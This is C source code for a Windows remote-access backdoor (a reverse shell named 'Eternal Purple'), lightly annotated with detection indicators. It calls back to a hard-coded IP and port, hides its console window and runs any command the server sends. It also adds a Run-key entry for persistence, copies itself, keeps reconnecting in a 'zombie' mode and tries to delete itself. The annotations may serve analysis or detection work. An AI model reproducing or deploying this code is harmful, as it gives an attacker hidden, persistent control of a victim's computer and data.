#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <wininet.h>
#include <winuser.h>
#include <windowsx.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <tchar.h>
// Local stand-in for BSD bzero(): zero-fills `size` bytes at `p` through memset.
// Used in Shell() to reset the receive/response buffers before each command.
#define bzero(p, size) (void) memset ((p), 0, (size))
// Hard-coded callback endpoint. Network IoC: outbound TCP to 192.168.1.49:8888.
unsigned short ServPort = 8888;  // server port
char *ServIP = "192.168.1.49";   // server IP
// Passed straight to ShowWindow() in WinMain: 0 (SW_HIDE) hides the console window,
// any non-zero value shows it.
int stealth_bool = 1;
//--Other state
int zombie_bool = 0;  // set by the "zombie" command; WinMain keeps reconnecting while it is 1
int sock;             // global socket shared by every command handler; assigned in connect_victim()
//BOOTRUN used to enable persistence on the victim's machine (autorun on boot)
// Persistence: writes this executable's full path under the current user's
// Run key (HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
// Detection: a REG_SZ value named "Eternal Purple" in that key pointing at
// this binary. Result text ("Failed\n" or the success line) is sent over `sock`.
// Returns 0 on success, -1 on any failure.
int bootRun(){
    // Output strings
    char err[128] = "Failed\n";  // error text sent to the server
    char suc[128] = "Created Persistance at \\HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n";  // success text sent to the server
    TCHAR szPath[MAX_PATH];
    DWORD pathLen = 0;
    pathLen = GetModuleFileName(NULL, szPath, MAX_PATH);  // full path of the running executable
    if (pathLen == 0) {
        send(sock, err, sizeof(err),0);
        return -1;
    }
    HKEY NewVal;  // handle to the opened Run key
    if(RegOpenKey(HKEY_CURRENT_USER, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),&NewVal) != ERROR_SUCCESS){
        send(socket, err, sizeof(err),0);
        return -1;
    }
    DWORD pathLenInBytes = pathLen * sizeof(*szPath);  // RegSetValueEx takes the data size in bytes
    if(RegSetValueEx(NewVal, TEXT("Eternal Purple"), 0, REG_SZ, (LPBYTE)szPath, pathLenInBytes) != ERROR_SUCCESS){
        RegCloseKey(NewVal);
        send(sock, err, sizeof(err), 0);
        return -1;
    }
    // Everything succeeded: close the key and report success to the server
    RegCloseKey(NewVal);
    send(sock,suc, sizeof(suc),0);
    return 0;
}
//STR_CUT used for cutting arguments out of commands
//pre: str is a char array containing the string to cut, slice_from is the position from which we cut, slice_to is the position of the final character
//post: Returns a pointer to a char array containing the cut string
char *
str_cut(char str[], int slice_from, int slice_to){
    // Copies a slice of `str` into a fresh calloc'd buffer and returns it;
    // ownership of the buffer passes to the caller.
    // Returns NULL for an empty string, an out-of-range start, or a slice
    // that matches neither branch below (e.g. slice_to <= slice_from with
    // non-negative indices).
    if (str[0] == '\0') return NULL;
    char *buffer;
    size_t str_len, buffer_len;
    if(slice_to < 0 && slice_from > slice_to){
        // Negative slice_to: offsets are measured back from the end of the string
        str_len = strlen(str);
        if (abs(slice_to) > str_len - 1)
            return NULL;
        if (abs(slice_from) > str_len)
            slice_from = (-1) * str_len;  // clamp the start to the beginning of the string
        buffer_len = slice_to - slice_from;
        str += (str_len + slice_from);
    }else if (slice_from >= 0 && slice_to > slice_from){
        // Non-negative indices measured from the start; copies slice_to - slice_from chars
        str_len = strlen(str);
        if (slice_from > str_len - 1)
            return NULL;
        buffer_len = slice_to - slice_from;
        str += slice_from;
    } else
        return NULL;
    buffer = calloc(buffer_len, sizeof(char));  // zero-filled, exactly buffer_len bytes
    strncpy(buffer, str, buffer_len);
    return buffer;
}
int replicate() {
    // Drops a copy of the running executable beside itself, named "<full path>_copy<ext>"
    // (host IoC: a sibling file carrying the "_copy" suffix). Reports over `sock`.
    // Returns 0 on success, 1 on failure.
    TCHAR szFileName[MAX_PATH];
    DWORD dwResult = GetModuleFileName(NULL, szFileName, MAX_PATH);  // own path
    if (dwResult == 0) {
        _tprintf(_T("GetModuleFileName failed with error %d\n"), GetLastError());
        return 1;
    }
    TCHAR szDestinationFile[MAX_PATH];
    char ret[128];  // status message sent to the server
    TCHAR szFileExtension[MAX_PATH];
    _tsplitpath(szFileName, NULL, NULL, NULL, szFileExtension);  // only the extension is kept
    // Constructed example: C:\x\a.exe -> C:\x\a.exe_copy.exe
    _stprintf(szDestinationFile, _T("%s_copy%s"), szFileName, szFileExtension);
    BOOL bResult = CopyFile(szFileName, szDestinationFile, FALSE);  // FALSE: overwrite an existing copy
    if (!bResult) {
        _tprintf(_T("CopyFile failed with error %d\n"), GetLastError());
        // NOTE(review): `ret` has not been written on this path before it is sent
        send(sock,ret, sizeof(ret),0);
        return 1;
    }
    sprintf(ret,("Copied %s to %s\n"), szFileName, szDestinationFile);
    send(sock,ret, sizeof(ret),0);
    return 0;
}
int panic() {
    // Self-deletion attempt: spawns `cmd /c del "<own path>"` and waits for it to finish.
    // Detection: a cmd.exe child of this process whose command line deletes the parent image.
    // Nothing is sent over the socket here; the caller in Shell() reports afterwards.
    // Returns 0 when the child ran to completion, 1 if the path lookup or spawn failed.
    TCHAR szFileName[MAX_PATH];
    DWORD dwResult = GetModuleFileName(NULL, szFileName, MAX_PATH);  // own path
    if (dwResult == 0) {
        return 1;
    }
    STARTUPINFO si;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);  // CreateProcess requires cb to be set
    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));
    TCHAR szCommandLine[MAX_PATH];
    _stprintf(szCommandLine, _T("cmd /c del \"%s\""), szFileName);
    BOOL bResult = CreateProcess(NULL, szCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
    if (!bResult) {
        return 1;
    }
    // NOTE(review): whether `del` succeeds while this image is still running is not established here
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}
//Main function which is called once connected
void Shell(){
    // Command loop: each iteration receives one message on `sock` and dispatches
    // on its prefix. Recognised commands: "q", "cd ", "persist", "zombie", "panic",
    // "replicate". Anything else is run through _popen() and its stdout is
    // sent back. Returns only when "zombie" clears sh_bool.
    char buffer[1024];           // raw command received from the server
    char container[1024];        // one fgets() chunk of command output
    char total_response[18384];  // accumulated output for the current command
    int sh_bool = 1;             // cleared by "zombie" to leave the loop
    while (sh_bool == 1) {
    jump:
        bzero(buffer,1024);
        bzero(container, sizeof(container));
        bzero(total_response, sizeof(total_response));
        recv(sock, buffer, 1024, 0);  // return value is not checked
        //-----ETERNALPURPLE-COMMANDS------
        if (strncmp("q", buffer, 1) == 0) {  // "q": close the socket and terminate the process
            closesocket(sock);
            WSACleanup();
            exit(0);
        }
        else if(strncmp("cd ",buffer,3) == 0){  // "cd <dir>": change working directory
            chdir(str_cut(buffer,3,100));  // argument is the text after "cd "
        }
        else if(strncmp("persist", buffer, 7) == 0){  // "persist": Run-key persistence via bootRun()
            bootRun();
        }
        else if(strncmp("zombie", buffer, 6) == 0){  // "zombie": leave the loop; WinMain reconnects while zombie_bool == 1
            char zomb[128] = "Zombie Mode Enabled \n";
            send(sock, zomb, sizeof(zomb),0);
            zombie_bool= 1;
            sh_bool = 0;
        }
        else if(strncmp("panic", buffer, 5) == 0){  // "panic": self-delete attempt, then report
            panic();
            char panic[128] = "Cleaning Up and Exiting ... \n";
            send(sock, panic, sizeof(panic),0);
        }
        else if(strncmp("replicate", buffer, 9) == 0){  // "replicate": copy the executable into the same folder
            char repl[128] = "Replicating executable\n";
            send(sock, repl, sizeof(repl),0);
            int ret = replicate();
        }
        else {  // Otherwise the whole message is executed as a shell command
            FILE *fp;  // read end of the command's stdout
            fp = _popen(buffer, "r");  // spawn a shell running the received text
            while(fgets(container,1024,fp) != NULL) {  // read stdout in 1024-byte chunks and append to total_response
                strcat(total_response, container);
            }
            // The full 18384-byte buffer is sent regardless of how much was filled
            send(sock, total_response, sizeof(total_response), 0);
            fclose(fp);  // close the pipe stream
        }
    }
}
void connect_victim(){
    // Opens the global `sock` and blocks until a TCP connection to ServIP:ServPort
    // succeeds, retrying every 30 ms. Terminates the process if WinSock cannot be initialised.
    struct sockaddr_in ServAddr;
    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0){
        exit(1);  // cannot continue without WinSock
    }
    sock = socket(AF_INET, SOCK_STREAM, 0);  // return value is not checked
    memset(&ServAddr, 0, sizeof(ServAddr));
    ServAddr.sin_family = AF_INET;
    ServAddr.sin_addr.s_addr = inet_addr(ServIP);
    ServAddr.sin_port = htons(ServPort);
    //3) Try to connect; loops until connect() returns 0
start:
    while( connect(sock, (struct sockaddr *) &ServAddr, sizeof(ServAddr)) != 0){
        Sleep(30);  // Sleep() takes milliseconds
        goto start;  // re-enters the while; equivalent to continuing the loop
    }
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow){
    // Entry point: allocates a console, shows or hides it according to stealth_bool,
    // then connects back to the server and runs Shell(); repeats while zombie mode is set.
    //1) Hide the console window from the local user
    HWND stealth;
    AllocConsole();
    stealth = FindWindow("ConsoleWindowClass", NULL);  // window created by AllocConsole()
    ShowWindow(stealth, stealth_bool);  // 0 (SW_HIDE) hides the window, 1 shows it
    do{
        // NOTE(review): the progress messages below print only when stealth_bool == 0,
        // i.e. when the console was just hidden — confirm that is the intended polarity
        if(stealth_bool == 0) printf("Trying to connect to server\n");
        //2) Set up networking and block until connected
        connect_victim();
        //4) Once connected, run the command loop (main functionality)
        if(stealth_bool == 0) printf("Connected entering Shell mode\n");
        Shell();
        if(stealth_bool == 0) printf("Exited Shell\n");
    }while(zombie_bool==1);  // "zombie" command makes this reconnect after Shell() returns
    //End of execution
    if(stealth_bool == 0) printf("Exiting\n");
    exit(0);
}